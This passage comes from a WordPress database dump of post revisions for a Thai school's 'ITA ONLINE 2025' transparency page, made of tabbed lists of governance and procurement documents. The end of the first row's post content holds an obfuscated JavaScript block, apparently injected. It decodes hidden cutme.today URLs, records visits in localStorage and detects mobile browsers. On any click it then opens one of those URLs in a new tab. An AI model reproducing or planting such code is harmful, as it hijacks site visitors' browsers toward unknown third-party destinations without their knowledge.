data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-07-01 09:23:29','2025-07-01 02:23:29','',871,'http://pakhaeng.ssk.in.th/?p=1495',0,'revision','',0),
(1496,1,'2025-07-01 09:24:13','2025-07-01 02:24:13','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":1259,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png\" alt=\"\" title=\"2025\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#f78da7\",\"titleBgHover\":\"#cf2e2e\",\"titleBgActive\":\"#cf2e2e\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#f78da7\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"size\":16,\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem 